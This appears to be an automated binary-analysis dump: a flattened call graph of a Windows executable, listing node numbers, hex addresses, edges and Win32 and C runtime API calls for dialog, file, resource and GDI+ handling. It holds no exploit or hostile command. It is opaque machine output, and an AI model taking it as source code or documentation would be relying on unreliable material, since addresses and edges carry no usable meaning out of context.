pre_c_initialization 23971 18d573 23972 18d580 23971->23972 23973 17ddd1 53 API calls 23972->23973 23974 18d594 23973->23974 23975 17400a _swprintf 51 API calls 23974->23975 23976 18d5a6 SetDlgItemTextW 23975->23976 23979 18ac74 PeekMessageW 23976->23979 23980 18acc8 23979->23980 23981 18ac8f GetMessageW 23979->23981 23982 18acb4 TranslateMessage DispatchMessageW 23981->23982 23983 18aca5 IsDialogMessageW 23981->23983 23982->23980 23983->23980 23983->23982 24794 185c77 121 API calls __vsnwprintf_l 24798 18fc60 51 API calls 2 library calls 24800 193460 RtlUnwind 24801 199c60 71 API calls _free 24803 18a89d 78 API calls 24804 187090 114 API calls 24805 18cc90 70 API calls 24850 18a990 97 API calls 24851 189b90 GdipCloneImage GdipAlloc 22934 18d891 19 API calls ___delayLoadHelper2@8 24852 199b90 21 API calls _free 24853 192397 48 API calls 22936 18d997 22937 18d89b 22936->22937 22938 18df59 ___delayLoadHelper2@8 19 API calls 22937->22938 22938->22937 24807 17ea98 FreeLibrary 24808 19ac0e 27 API calls TranslatorGuardHandler 22939 171385 82 API calls 3 library calls 24856 195780 QueryPerformanceFrequency QueryPerformanceCounter 24811 1976bd 52 API calls 2 library calls 24812 1716b0 84 API calls 23147 1990b0 23155 19a56f 23147->23155 23150 1990c4 23152 1990cc 23153 1990d9 23152->23153 23163 1990e0 11 API calls 23152->23163 23164 19a458 23155->23164 23158 19a5ae TlsAlloc 23159 19a59f 23158->23159 23160 18ec4a TranslatorGuardHandler 5 API calls 23159->23160 23161 1990ba 23160->23161 23161->23150 23162 199029 20 API calls _free 23161->23162 23162->23152 23163->23150 23165 19a488 23164->23165 23168 19a484 23164->23168 23165->23158 23165->23159 23166 19a4a8 23166->23165 23169 19a4b4 GetProcAddress 23166->23169 23168->23165 23168->23166 23171 19a4f4 23168->23171 23170 19a4c4 __crt_fast_encode_pointer 23169->23170 23170->23165 23172 19a515 LoadLibraryExW 23171->23172 23177 19a50a 23171->23177 23173 19a532 GetLastError 23172->23173 23175 19a54a 23172->23175 23173->23175 23176 19a53d LoadLibraryExW 23173->23176 23174 19a561 FreeLibrary 23174->23177 23175->23174 23175->23177 23176->23175 23177->23168 23178 19a3b0 23179 19a3bb 23178->23179 23181 19a3e4 23179->23181 23183 19a3e0 23179->23183 23184 19a6ca 23179->23184 23191 19a410 DeleteCriticalSection 23181->23191 23185 19a458 _free 5 API calls 23184->23185 23186 19a6f1 23185->23186 23187 19a70f InitializeCriticalSectionAndSpinCount 23186->23187 23188 19a6fa 23186->23188 23187->23188 23189 18ec4a TranslatorGuardHandler 5 API calls 23188->23189 23190 19a726 23189->23190 23190->23179 23191->23183 24813 191eb0 6 API calls 3 library calls 24858 1979b7 55 API calls _free 24814 1796a0 79 API calls 24861 19e9a0 51 API calls 24817 18e4a2 38 API calls 2 library calls 23213 1710d5 23218 175bd7 23213->23218 23219 175be1 __EH_prolog 23218->23219 23225 17b07d 23219->23225 23221 175bed 23231 175dcc GetCurrentProcess GetProcessAffinityMask 23221->23231 23226 17b087 __EH_prolog 23225->23226 23232 17ea80 80 API calls 23226->23232 23228 17b099 23233 17b195 23228->23233 23232->23228 23234 17b1a7 ___scrt_get_show_window_mode 23233->23234 23237 180948 23234->23237 23240 180908 GetCurrentProcess GetProcessAffinityMask 23237->23240 23241 17b10f 23240->23241 23241->23221 24819 18acd0 100 API calls 24864 1819d0 26 API calls std::bad_exception::bad_exception 23249 18ead2 23250 18eade ___DestructExceptionObject 23249->23250 23275 18e5c7 23250->23275 23252 18eae5 23254 18eb0e 23252->23254 23355 18ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23252->23355 23258 18eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23254->23258 23286 19824d 23254->23286 23260 18ebad 23258->23260 23356 197243 38 API calls 2 library calls 23258->23356 23259 18eb2d ___DestructExceptionObject 23294 18f020 23260->23294 23270 18ebd9 23272 18ebe2 23270->23272 23357 19764a 28 API calls _abort 23270->23357 23358 18e73e 13 API calls 2 library calls 23272->23358 23276 18e5d0 23275->23276 23359 18ed5b IsProcessorFeaturePresent 23276->23359 23278 18e5dc 23360 192016 23278->23360 23280 18e5e1 23281 18e5e5 23280->23281 23369 1980d7 23280->23369 23281->23252 23284 18e5fc 23284->23252 23287 198264 23286->23287 23288 18ec4a TranslatorGuardHandler 5 API calls 23287->23288 23289 18eb27 23288->23289 23289->23259 23290 1981f1 23289->23290 23291 198220 23290->23291 23292 18ec4a TranslatorGuardHandler 5 API calls 23291->23292 23293 198249 23292->23293 23293->23258 23461 18f350 23294->23461 23297 18ebb3 23298 19819e 23297->23298 23463 19b290 23298->23463 23300 18ebbc 23303 18d5d4 23300->23303 23301 1981a7 23301->23300 23467 19b59a 38 API calls 23301->23467 23588 1800cf 23303->23588 23307 18d5f3 23637 18a335 23307->23637 23309 18d5fc 23641 1813b3 GetCPInfo 23309->23641 23311 18d606 ___scrt_get_show_window_mode 23312 18d619 GetCommandLineW 23311->23312 23313 18d628 23312->23313 23314 18d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23312->23314 23644 18bc84 23313->23644 23315 17400a _swprintf 51 API calls 23314->23315 23317 18d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23315->23317 23655 18aded LoadBitmapW 23317->23655 23320 18d6a0 23649 18d287 23320->23649 23321 18d636 OpenFileMappingW 23324 18d64f MapViewOfFile 23321->23324 23325 18d696 CloseHandle 23321->23325 23326 18d68d UnmapViewOfFile 23324->23326 23327 18d660 __vsnwprintf_l 23324->23327 23325->23314 23326->23325 23332 18d287 2 API calls 23327->23332 23334 18d67c 23332->23334 23333 188835 8 API calls 23335 18d76a DialogBoxParamW 23333->23335 23334->23326 23336 18d7a4 23335->23336 23337 18d7bd 23336->23337 23338 18d7b6 Sleep 23336->23338 23341 18d7cb 23337->23341 23685 18a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23337->23685 23338->23337 23340 18d7ea DeleteObject 23342 18d7ff DeleteObject 23340->23342 23343 18d806 23340->23343 23341->23340 23342->23343 23344 18d849 23343->23344 23345 18d837 23343->23345 23682 18a39d 23344->23682 23686 18d2e6 6 API calls 23345->23686 23348 18d83d CloseHandle 23348->23344 23349 18d883 23350 19757e GetModuleHandleW 23349->23350 23351 18ebcf 23350->23351 23351->23270 23352 1976a7 23351->23352 23895 197424 23352->23895 23355->23252 23356->23260 23357->23272 23358->23259 23359->23278 23361 19201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23360->23361 23373 19310e 23361->23373 23363 192029 23363->23280 23366 192031 23367 19203c 23366->23367 23387 19314a DeleteCriticalSection 23366->23387 23367->23280 23415 19b73a 23369->23415 23372 19203f 8 API calls 3 library calls 23372->23281 23374 193117 23373->23374 23376 193140 23374->23376 23378 192025 23374->23378 23388 193385 23374->23388 23393 19314a DeleteCriticalSection 23376->23393 23378->23363 23379 19215c 23378->23379 23408 19329a 23379->23408 23381 192166 23382 192171 23381->23382 23413 193348 6 API calls try_get_function 23381->23413 23382->23366 23384 19217f 23385 19218c 23384->23385 23414 19218f 6 API calls ___vcrt_FlsFree 23384->23414 23385->23366 23387->23363 23394 193179 23388->23394 23391 1933bc InitializeCriticalSectionAndSpinCount 23392 1933a8 23391->23392 23392->23374 23393->23378 23395 1931ad 23394->23395 23399 1931a9 23394->23399 23395->23391 23395->23392 23396 1931cd 23396->23395 23398 1931d9 GetProcAddress 23396->23398 23400 1931e9 __crt_fast_encode_pointer 23398->23400 23399->23395 23399->23396 23401 193219 23399->23401 23400->23395 23402 193241 LoadLibraryExW 23401->23402 23403 193236 23401->23403 23404 19325d GetLastError 23402->23404 23407 193275 23402->23407 23403->23399 23405 193268 LoadLibraryExW 23404->23405 23404->23407 23405->23407 23406 19328c FreeLibrary 23406->23403 23407->23403 23407->23406 23409 193179 try_get_function 5 API calls 23408->23409 23410 1932b4 23409->23410 23411 1932cc TlsAlloc 23410->23411 23412 1932bd 23410->23412 23412->23381 23413->23384 23414->23382 23416 19b757 23415->23416 23419 19b753 23415->23419 23416->23419 23421 199e60 23416->23421 23417 18ec4a TranslatorGuardHandler 5 API calls 23418 18e5ee 23417->23418 23418->23284 23418->23372 23419->23417 23422 199e6c ___DestructExceptionObject 23421->23422 23433 19a3f1 EnterCriticalSection 23422->23433 23424 199e73 23434 19bc39 23424->23434 23426 199e82 23427 199e91 23426->23427 23447 199ce9 29 API calls 23426->23447 23449 199ead LeaveCriticalSection _abort 23427->23449 23430 199e8c 23448 199d9f GetStdHandle GetFileType 23430->23448 23431 199ea2 ___DestructExceptionObject 23431->23416 23433->23424 23435 19bc45 ___DestructExceptionObject 23434->23435 23436 19bc69 23435->23436 23437 19bc52 23435->23437 23450 19a3f1 EnterCriticalSection 23436->23450 23458 19895a 20 API calls _free 23437->23458 23440 19bc57 23459 198839 26 API calls pre_c_initialization 23440->23459 23442 19bc61 ___DestructExceptionObject 23442->23426 23443 19bca1 23460 19bcc8 LeaveCriticalSection _abort 23443->23460 23445 19bc75 23445->23443 23451 19bb8a 23445->23451 23447->23430 23448->23427 23449->23431 23450->23445 23452 1985a9 _free 20 API calls 23451->23452 23453 19bb9c 23452->23453 23455 19a6ca 11 API calls 23453->23455 23457 19bba9 23453->23457 23454 1984de _free 20 API calls 23456 19bbfb 23454->23456 23455->23453 23456->23445 23457->23454 23458->23440 23459->23442 23460->23442 23462 18f033 GetStartupInfoW 23461->23462 23462->23297 23464 19b299 23463->23464 23466 19b2a2 23463->23466 23468 19b188 23464->23468 23466->23301 23467->23301 23469 198fa5 _abort 38 API calls 23468->23469 23470 19b195 23469->23470 23488 19b2ae 23470->23488 23472 19b19d 23497 19af1b 23472->23497 23475 19b1b4 23475->23466 23476 198518 __onexit 21 API calls 23477 19b1c5 23476->23477 23478 19b1f7 23477->23478 23504 19b350 23477->23504 23480 1984de _free 20 API calls 23478->23480 23480->23475 23482 19b1f2 23514 19895a 20 API calls _free 23482->23514 23484 19b23b 23484->23478 23515 19adf1 26 API calls 23484->23515 23485 19b20f 23485->23484 23486 1984de _free 20 API calls 23485->23486 23486->23484 23489 19b2ba ___DestructExceptionObject 23488->23489 23490 198fa5 _abort 38 API calls 23489->23490 23492 19b2c4 23490->23492 23493 19b348 ___DestructExceptionObject 23492->23493 23496 1984de _free 20 API calls 23492->23496 23516 198566 38 API calls _abort 23492->23516 23517 19a3f1 EnterCriticalSection 23492->23517 23518 19b33f LeaveCriticalSection _abort 23492->23518 23493->23472 23496->23492 23498 193dd6 __cftof 38 API calls 23497->23498 23499 19af2d 23498->23499 23500 19af3c GetOEMCP 23499->23500 23501 19af4e 23499->23501 23502 19af65 23500->23502 23501->23502 23503 19af53 GetACP 23501->23503 23502->23475 23502->23476 23503->23502 23505 19af1b 40 API calls 23504->23505 23506 19b36f 23505->23506 23509 19b3c0 IsValidCodePage 23506->23509 23511 19b376 23506->23511 23513 19b3e5 ___scrt_get_show_window_mode 23506->23513 23507 18ec4a TranslatorGuardHandler 5 API calls 23508 19b1ea 23507->23508 23508->23482 23508->23485 23510 19b3d2 GetCPInfo 23509->23510 23509->23511 23510->23511 23510->23513 23511->23507 23519 19aff4 GetCPInfo 23513->23519 23514->23478 23515->23478 23517->23492 23518->23492 23520 19b0d8 23519->23520 23524 19b02e 23519->23524 23523 18ec4a TranslatorGuardHandler 5 API calls 23520->23523 23526 19b184 23523->23526 23529 19c099 23524->23529 23526->23511 23528 19a275 __vswprintf_c_l 43 API calls 23528->23520 23530 193dd6 __cftof 38 API calls 23529->23530 23531 19c0b9 MultiByteToWideChar 23530->23531 23533 19c18f 23531->23533 23534 19c0f7 23531->23534 23535 18ec4a TranslatorGuardHandler 5 API calls 23533->23535 23536 198518 __onexit 21 API calls 23534->23536 23539 19c118 __vsnwprintf_l ___scrt_get_show_window_mode 23534->23539 23537 19b08f 23535->23537 23536->23539 23543 19a275 23537->23543 23538 19c189 23548 19a2c0 20 API calls _free 23538->23548 23539->23538 23541 19c15d MultiByteToWideChar 23539->23541 23541->23538 23542 19c179 GetStringTypeW 23541->23542 23542->23538 23544 193dd6 __cftof 38 API calls 23543->23544 23545 19a288 23544->23545 23549 19a058 23545->23549 23548->23533 23551 19a073 __vswprintf_c_l 23549->23551 23550 19a099 MultiByteToWideChar 23552 19a24d 23550->23552 23553 19a0c3 23550->23553 23551->23550 23554 18ec4a TranslatorGuardHandler 5 API calls 23552->23554 23558 198518 __onexit 21 API calls 23553->23558 23560 19a0e4 __vsnwprintf_l 23553->23560 23555 19a260 23554->23555 23555->23528 23556 19a12d MultiByteToWideChar 23557 19a199 23556->23557 23559 19a146 23556->23559 23585 19a2c0 20 API calls _free 23557->23585 23558->23560 23576 19a72c 23559->23576 23560->23556 23560->23557 23564 19a1a8 23566 198518 __onexit 21 API calls 23564->23566 23570 19a1c9 __vsnwprintf_l 23564->23570 23565 19a170 23565->23557 23567 19a72c __vswprintf_c_l 11 API calls 23565->23567 23566->23570 23567->23557 23568 19a23e 23584 19a2c0 20 API calls _free 23568->23584 23570->23568 23571 19a72c __vswprintf_c_l 11 API calls 23570->23571 23572 19a21d 23571->23572 23572->23568 23573 19a22c WideCharToMultiByte 23572->23573 23573->23568 23574 19a26c 23573->23574 23586 19a2c0 20 API calls _free 23574->23586 23577 19a458 _free 5 API calls 23576->23577 23578 19a753 23577->23578 23581 19a75c 23578->23581 23587 19a7b4 10 API calls 3 library calls 23578->23587 23580 19a79c LCMapStringW 23580->23581 23582 18ec4a TranslatorGuardHandler 5 API calls 23581->23582 23583 19a15d 23582->23583 23583->23557 23583->23564 23583->23565 23584->23557 23585->23552 23586->23557 23587->23580 23589 18e360 23588->23589 23590 1800d9 GetModuleHandleW 23589->23590 23591 1800f0 GetProcAddress 23590->23591 23592 180154 23590->23592 23594 180109 23591->23594 23595 180121 GetProcAddress 23591->23595 23593 180484 GetModuleFileNameW 23592->23593 23696 1970dd 42 API calls __vsnwprintf_l 23592->23696 23608 1804a3 23593->23608 23594->23595 23595->23592 23597 180133 23595->23597 23597->23592 23598 1803be 23598->23593 23599 1803c9 GetModuleFileNameW CreateFileW 23598->23599 23600 180478 CloseHandle 23599->23600 23601 1803fc SetFilePointer 23599->23601 23600->23593 23601->23600 23602 18040c ReadFile 23601->23602 23602->23600 23605 18042b 23602->23605 23605->23600 23607 180085 2 API calls 23605->23607 23606 1804d2 CompareStringW 23606->23608 23607->23605 23608->23606 23609 180508 GetFileAttributesW 23608->23609 23610 180520 23608->23610 23687 17acf5 23608->23687 23690 180085 23608->23690 23609->23608 23609->23610 23611 18052a 23610->23611 23614 180560 23610->23614 23613 180542 GetFileAttributesW 23611->23613 23616 18055a 23611->23616 23612 18066f 23636 189da4 GetCurrentDirectoryW 23612->23636 23613->23611 23613->23616 23614->23612 23615 17acf5 GetVersionExW 23614->23615 23617 18057a 23615->23617 23616->23614 23618 180581 23617->23618 23619 1805e7 23617->23619 23621 180085 2 API calls 23618->23621 23620 17400a _swprintf 51 API calls 23619->23620 23622 18060f AllocConsole 23620->23622 23623 18058b 23621->23623 23624 18061c GetCurrentProcessId AttachConsole 23622->23624 23625 180667 ExitProcess 23622->23625 23626 180085 2 API calls 23623->23626 23700 1935b3 23624->23700 23628 180595 23626->23628 23697 17ddd1 23628->23697 23629 18063d GetStdHandle WriteConsoleW Sleep FreeConsole 23629->23625 23632 17400a _swprintf 51 API calls 23633 1805c3 23632->23633 23634 17ddd1 53 API calls 23633->23634 23635 1805d2 23634->23635 23635->23625 23636->23307 23638 180085 2 API calls 23637->23638 23639 18a349 OleInitialize 23638->23639 23640 18a36c GdiplusStartup SHGetMalloc 23639->23640 23640->23309 23642 1813d7 IsDBCSLeadByte 23641->23642 23642->23642 23643 1813ef 23642->23643 23643->23311 23645 18bc8e 23644->23645 23646 18bda4 23645->23646 23647 18179d CharUpperW 23645->23647 23725 17ecad 80 API calls ___scrt_get_show_window_mode 23645->23725 23646->23320 23646->23321 23647->23645 23650 18e360 23649->23650 23651 18d294 SetEnvironmentVariableW 23650->23651 23652 18d2b7 23651->23652 23653 18d2df 23652->23653 23654 18d2d3 SetEnvironmentVariableW 23652->23654 23653->23314 23654->23653 23656 18ae0e 23655->23656 23657 18ae15 23655->23657 23731 189e1c FindResourceW 23656->23731 23658 18ae2a 23657->23658 23659 18ae1b GetObjectW 23657->23659 23726 189d1a 23658->23726 23659->23658 23663 18ae80 23674 17d31c 23663->23674 23664 18ae5c 23747 189d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23664->23747 23665 189e1c 13 API calls 23667 18ae4d 23665->23667 23667->23664 23669 18ae53 DeleteObject 23667->23669 23668 18ae64 23748 189d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23668->23748 23669->23664 23671 18ae6d 23749 189f5d 8 API calls ___scrt_get_show_window_mode 23671->23749 23673 18ae74 DeleteObject 23673->23663 23760 17d341 23674->23760 23676 17d328 23800 17da4e GetModuleHandleW FindResourceW 23676->23800 23679 188835 23886 18e24a 23679->23886 23683 18a3cc GdiplusShutdown CoUninitialize 23682->23683 23683->23349 23685->23341 23686->23348 23688 17ad09 GetVersionExW 23687->23688 23689 17ad45 23687->23689 23688->23689 23689->23608 23691 18e360 23690->23691 23692 180092 GetSystemDirectoryW 23691->23692 23693 1800c8 23692->23693 23694 1800aa 23692->23694 23693->23608 23695 1800bb LoadLibraryW 23694->23695 23695->23693 23696->23598 23702 17ddff 23697->23702 23701 1935bb 23700->23701 23701->23629 23701->23701 23708 17d28a 23702->23708 23705 17de22 LoadStringW 23706 17ddfc 23705->23706 23707 17de39 LoadStringW 23705->23707 23706->23632 23707->23706 23713 17d1c3 23708->23713 23710 17d2a7 23711 17d2bc 23710->23711 23721 17d2c8 26 API calls 23710->23721 23711->23705 23711->23706 23714 17d1de 23713->23714 23720 17d1d7 _strncpy 23713->23720 23716 17d202 23714->23716 23722 181596 WideCharToMultiByte 23714->23722 23719 17d233 23716->23719 23723 17dd6b 50 API calls __vsnprintf 23716->23723 23724 1958d9 26 API calls 3 library calls 23719->23724 23720->23710 23721->23711 23722->23716 23723->23719 23724->23720 23725->23645 23750 189d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23726->23750 23728 189d21 23730 189d2d 23728->23730 23751 189d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23728->23751 23730->23663 23730->23664 23730->23665 23732 189e3e SizeofResource 23731->23732 23733 189e70 23731->23733 23732->23733 23734 189e52 LoadResource 23732->23734 23733->23657 23734->23733 23735 189e63 LockResource 23734->23735 23735->23733 23736 189e77 GlobalAlloc 23735->23736 23736->23733 23737 189e92 GlobalLock 23736->23737 23738 189f21 GlobalFree 23737->23738 23739 189ea1 __vsnwprintf_l 23737->23739 23738->23733 23740 189ea9 CreateStreamOnHGlobal 23739->23740 23741 189f1a GlobalUnlock 23740->23741 23742 189ec1 23740->23742 23741->23738 23752 189d7b GdipAlloc 23742->23752 23745 189f05 23745->23741 23746 189eef GdipCreateHBITMAPFromBitmap 23746->23745 23747->23668 23748->23671 23749->23673 23750->23728 23751->23730 23753 189d9a 23752->23753 23754 189d8d 23752->23754 23753->23741 23753->23745 23753->23746 23756 189b0f 23754->23756 23757 189b30 GdipCreateBitmapFromStreamICM 23756->23757 23758 189b37 GdipCreateBitmapFromStream 23756->23758 23759 189b3c 23757->23759 23758->23759 23759->23753 23761 17d34b _wcschr __EH_prolog 23760->23761 23762 17d37a GetModuleFileNameW 23761->23762 23763 17d3ab 23761->23763 23764 17d394 23762->23764 23802 1799b0 23763->23802 23764->23763 23767 17d407 23813 195a90 26 API calls 3 library calls 23767->23813 23769 183781 76 API calls 23771 17d3db 23769->23771 23771->23767 23771->23769 23795 17d627 23771->23795 23772 17d41a 23814 195a90 26 API calls 3 library calls 23772->23814 23774 17d563 23774->23795 23839 179d30 77 API calls 23774->23839 23778 17d57d ___std_exception_copy 23779 179bf0 80 API calls 23778->23779 23778->23795 23782 17d5a6 ___std_exception_copy 23779->23782 23781 17d42c 23781->23774 23781->23795 23815 179e40 23781->23815 23830 179bf0 23781->23830 23838 179d30 77 API calls 23781->23838 23782->23795 23797 17d5b2 ___std_exception_copy 23782->23797 23840 18137a MultiByteToWideChar 23782->23840 23784 17d72b 23841 17ce72 76 API calls 23784->23841 23786 17da0a 23846 17ce72 76 API calls 23786->23846 23788 17d9fa 23788->23676 23789 17d771 23842 195a90 26 API calls 3 library calls 23789->23842 23791 17d78b 23843 195a90 26 API calls 3 library calls 23791->23843 23792 17d742 23792->23789 23794 183781 76 API calls 23792->23794 23794->23792 23823 179653 23795->23823 23796 181596 WideCharToMultiByte 23796->23797 23797->23784 23797->23786 23797->23788 23797->23795 23797->23796 23844 17dd6b 50 API calls __vsnprintf 23797->23844 23845 1958d9 26 API calls 3 library calls 23797->23845 23801 17d32f 23800->23801 23801->23679 23803 1799ba 23802->23803 23804 179a39 CreateFileW 23803->23804 23805 179aaa 23804->23805 23806 179a59 GetLastError 23804->23806 23807 179ae1 23805->23807 23809 179ac7 SetFileTime 23805->23809 23808 17b66c 2 API calls 23806->23808 23807->23771 23810 179a79 23808->23810 23809->23807 23810->23805 23811 179a7d CreateFileW GetLastError 23810->23811 23812 179aa1 23811->23812 23812->23805 23813->23772 23814->23781 23816 179e64 SetFilePointer 23815->23816 23817 179e53 23815->23817 23818 179e82 GetLastError 23816->23818 23819 179e9d 23816->23819 23817->23819 23847 176fa5 75 API calls 23817->23847 23818->23819 23821 179e8c 23818->23821 23819->23781 23821->23819 23848 176fa5 75 API calls 23821->23848 23824 179688 23823->23824 23825 179677 23823->23825 23824->23676 23825->23824 23826 179683 23825->23826 23827 17968a 23825->23827 23849 179817 23826->23849 23854 1796d0 23827->23854 23832 179bfc 23830->23832 23835 179c03 23830->23835 23832->23781 23833 179c9e 23833->23832 23881 176f6b 75 API calls 23833->23881 23835->23832 23835->23833 23836 179cc0 23835->23836 23869 17984e 23835->23869 23836->23832 23837 17984e 5 API calls 23836->23837 23837->23836 23838->23781 23839->23778 23840->23797 23841->23792 23842->23791 23843->23795 23844->23797 23845->23797 23846->23788 23847->23816 23848->23819 23850 179824 23849->23850 23851 179820 23849->23851 23850->23851 23860 17a12d 23850->23860 23851->23824 23855 1796fa 23854->23855 23856 1796dc 23854->23856 23857 179719 23855->23857 23868 176e3e 74 API calls 23855->23868 23856->23855 23858 1796e8 CloseHandle 23856->23858 23857->23824 23858->23855 23861 18e360 23860->23861 23862 17a13a DeleteFileW 23861->23862 23863 17984c 23862->23863 23864 17a14d 23862->23864 23863->23824 23865 17b66c 2 API calls 23864->23865 23866 17a161 23865->23866 23866->23863 23867 17a165 DeleteFileW 23866->23867 23867->23863 23868->23857 23870 179867 ReadFile 23869->23870 23871 17985c GetStdHandle 23869->23871 23872 179880 23870->23872 23873 1798a0 23870->23873 23871->23870 23882 179989 23872->23882 23873->23835 23875 179887 23876 179895 23875->23876 23877 1798b7 23875->23877 23878 1798a8 GetLastError 23875->23878 23880 17984e GetFileType 23876->23880 23877->23873 23879 1798c7 GetLastError 23877->23879 23878->23873 23878->23877 23879->23873 23879->23876 23880->23873 23881->23832 23883 179992 GetFileType 23882->23883 23884 17998f 23882->23884 23885 1799a0 23883->23885 23884->23875 23885->23875 23887 18e24f ___std_exception_copy 23886->23887 23888 188854 23887->23888 23892 1971ad 7 API calls 2 library calls 23887->23892 23893 18ecce RaiseException Concurrency::cancel_current_task new 23887->23893 23894 18ecb1 RaiseException Concurrency::cancel_current_task 23887->23894 23888->23333 23892->23887 23896 197430 _abort 23895->23896 23897 197448 23896->23897 23898 19757e _abort GetModuleHandleW 23896->23898 23917 19a3f1 EnterCriticalSection 23897->23917 23900 19743c 23898->23900 23900->23897 23929 1975c2 GetModuleHandleExW 23900->23929 23904 19750b 23921 19753d 23904->23921 23905 197537 23938 1a1a19 5 API calls TranslatorGuardHandler 23905->23938 23909 1981f1 _abort 5 API calls 23914 1974dd 23909->23914 23910 1981f1 _abort 5 API calls 23915 1974ee 23910->23915 23911 197450 23912 1974c5 23911->23912 23911->23915 23937 197f30 20 API calls _abort 23911->23937 23912->23909 23912->23914 23914->23910 23918 19752e 23915->23918 23917->23911 23939 19a441 LeaveCriticalSection 23918->23939 23920 197507 23920->23904 23920->23905 23940 19a836 23921->23940 23924 19756b 23927 1975c2 _abort 8 API calls 23924->23927 23925 19754b GetPEB 23925->23924 23926 19755b GetCurrentProcess TerminateProcess 23925->23926 23926->23924 23928 197573 ExitProcess 23927->23928 23930 1975ec GetProcAddress 23929->23930 23931 19760f 23929->23931 23934 197601 23930->23934 23932 19761e 23931->23932 23933 197615 FreeLibrary 23931->23933 23935 18ec4a TranslatorGuardHandler 5 API calls 23932->23935 23933->23932 23934->23931 23936 197628 23935->23936 23936->23897 23937->23912 23939->23920 23941 19a85b 23940->23941 23945 19a851 23940->23945 23942 19a458 _free 5 API calls 23941->23942 23942->23945 23943 18ec4a TranslatorGuardHandler 5 API calls 23944 197547 23943->23944 23944->23924 23944->23925 23945->23943 24820 18eac0 27 API calls pre_c_initialization 24868 19ebc1 21 API calls __vswprintf_c_l 24869 1897c0 10 API calls 24822 199ec0 21 API calls 24870 19b5c0 GetCommandLineA GetCommandLineW 24823 18a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 23962 18e1f9 23963 18e203 23962->23963 23964 18df59 ___delayLoadHelper2@8 19 API calls 23963->23964 23965 18e210 23964->23965 24872 19abfd 6 API calls TranslatorGuardHandler 24874 18ebf7 20 API calls 23989 18aee0 23990 18aeea __EH_prolog 23989->23990 24152 17130b 23990->24152 23993 18b5cb 24217 18cd2e 23993->24217 23994 18af2c 23997 18af39 23994->23997 23998 18afa2 23994->23998 24057 18af18 23994->24057 24002 18af3e 23997->24002 24003 18af75 23997->24003 24001 18b041 GetDlgItemTextW 23998->24001 24007 18afbc 23998->24007 23999 18b5e9 SendMessageW 24000 18b5f7 23999->24000 24005 18b600 SendDlgItemMessageW 24000->24005 24006 18b611 GetDlgItem SendMessageW 24000->24006 24001->24003 24004 18b077 24001->24004 24012 17ddd1 53 API calls 24002->24012 24002->24057 24008 18af96 KiUserCallbackDispatcher 24003->24008 24003->24057 24009 18b08f GetDlgItem 24004->24009 24149 18b080 24004->24149 24005->24006 24235 189da4 GetCurrentDirectoryW 24006->24235 24011 17ddd1 53 API calls 24007->24011 24008->24057 24014 18b0a4 SendMessageW SendMessageW 24009->24014 24015 18b0c5 SetFocus 24009->24015 24016 18afde SetDlgItemTextW 24011->24016 24017 18af58 24012->24017 24013 18b641 GetDlgItem 24018 18b65e 24013->24018 24019 18b664 SetWindowTextW 24013->24019 24014->24015 24020 18b0d5 24015->24020 24032 18b0ed 24015->24032 24021 18afec 24016->24021 24257 171241 SHGetMalloc 24017->24257 24018->24019 24236 18a2c7 GetClassNameW 24019->24236 24026 17ddd1 53 API calls 24020->24026 24030 18aff9 GetMessageW 24021->24030 24021->24057 24023 18af5f 24027 18af63 SetDlgItemTextW 24023->24027 24023->24057 24024 18b56b 24028 17ddd1 53 API calls 24024->24028 24031 18b0df 24026->24031 24027->24057 24033 18b57b SetDlgItemTextW 24028->24033 24035 18b010 IsDialogMessageW 24030->24035 24030->24057 24258 18cb5a 24031->24258 24040 17ddd1 53 API calls 24032->24040 24037 18b58f 24033->24037 24035->24021 24039 18b01f TranslateMessage DispatchMessageW 24035->24039 24043 17ddd1 53 API calls 24037->24043 24039->24021 24042 18b124 24040->24042 24041 18b6af 24045 18b6df 24041->24045 24050 17ddd1 53 API calls 24041->24050 24046 17400a _swprintf 51 API calls 24042->24046 24047 18b5b8 24043->24047 24044 18bdf5 98 API calls 24044->24041 24056 18bdf5 98 API calls 24045->24056 24078 18b797 24045->24078 24051 18b136 24046->24051 24052 17ddd1 53 API calls 24047->24052 24048 18b0e6 24162 17a04f 24048->24162 24054 18b6c2 SetDlgItemTextW 24050->24054 24055 18cb5a 16 API calls 24051->24055 24052->24057 24064 17ddd1 53 API calls 24054->24064 24055->24048 24065 18b6fa 24056->24065 24058 18b847 24061 18b859 24058->24061 24062 18b850 EnableWindow 24058->24062 24059 18b17f 24168 18a322 SetCurrentDirectoryW 24059->24168 24060 18b174 GetLastError 24060->24059 24066 18b876 24061->24066 24276 1712c8 GetDlgItem EnableWindow 24061->24276 24062->24061 24068 18b6d6 SetDlgItemTextW 24064->24068 24074 18b70c 24065->24074 24088 18b731 24065->24088 24073 18b89d 24066->24073 24080 18b895 SendMessageW 24066->24080 24067 18b195 24071 18b19e GetLastError 24067->24071 24072 18b1ac 24067->24072 24068->24045 24070 18b78a 24076 18bdf5 98 API calls 24070->24076 24071->24072 24084 18b237 24072->24084 24085 18b1c4 GetTickCount 24072->24085 24128 18b227 24072->24128 24073->24057 24081 17ddd1 53 API calls 24073->24081 24274 189635 32 API calls 24074->24274 24075 18b86c 24277 1712c8 GetDlgItem EnableWindow 24075->24277 24076->24078 24078->24058 24086 18b825 24078->24086 24093 17ddd1 53 API calls 24078->24093 24080->24073 24087 18b8b6 SetDlgItemTextW 24081->24087 24082 18b725 24082->24088 24083 18b46c 24177 1712e6 GetDlgItem ShowWindow 24083->24177 24090 18b24f GetModuleFileNameW 24084->24090 24097 18b407 24084->24097 24091 17400a _swprintf 51 API calls 24085->24091 24275 189635 32 API calls 24086->24275 24087->24057 24088->24070 24094 18bdf5 98 API calls 24088->24094 24268 17eb3a 80 API calls 24090->24268 24098 18b1dd 24091->24098 24093->24078 24100 18b75f 24094->24100 24095 18b47c 24178 1712e6 GetDlgItem ShowWindow 24095->24178 24097->24003 24103 17ddd1 53 API calls 24097->24103 24169 17971e 